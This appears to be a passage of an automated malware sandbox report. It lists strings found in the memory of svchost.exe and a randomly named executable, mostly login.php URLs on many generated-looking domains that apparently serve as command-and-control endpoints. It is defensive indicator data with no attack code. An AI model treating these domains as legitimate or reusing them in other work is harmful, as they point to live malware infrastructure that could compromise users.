Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375772840.0000000003361000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365635316.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2849287050.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381004146.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376920856.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywen.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000156A000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/login.php
Source: svchost.exe, 00000002.00000003.2612263098.00000000040F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/P
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341444075.00000000093C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycyq.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydaq.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygav.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237916986.000000000337D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001018000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygug.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361214474.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylul.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pufymoq.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2809409371.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2814428917.00000000040FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyweq.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxug.com/login.php
Source: svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418889094.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3278908147.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3406954551.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxyp.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybig.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3407860513.0000000000826000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycil.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.phpB
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyduv.com/login.php
Source: svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygaq.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypup.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyteq.com/http://ganyvoz.com/
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/login.php
PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000014D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybeq.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/login.php
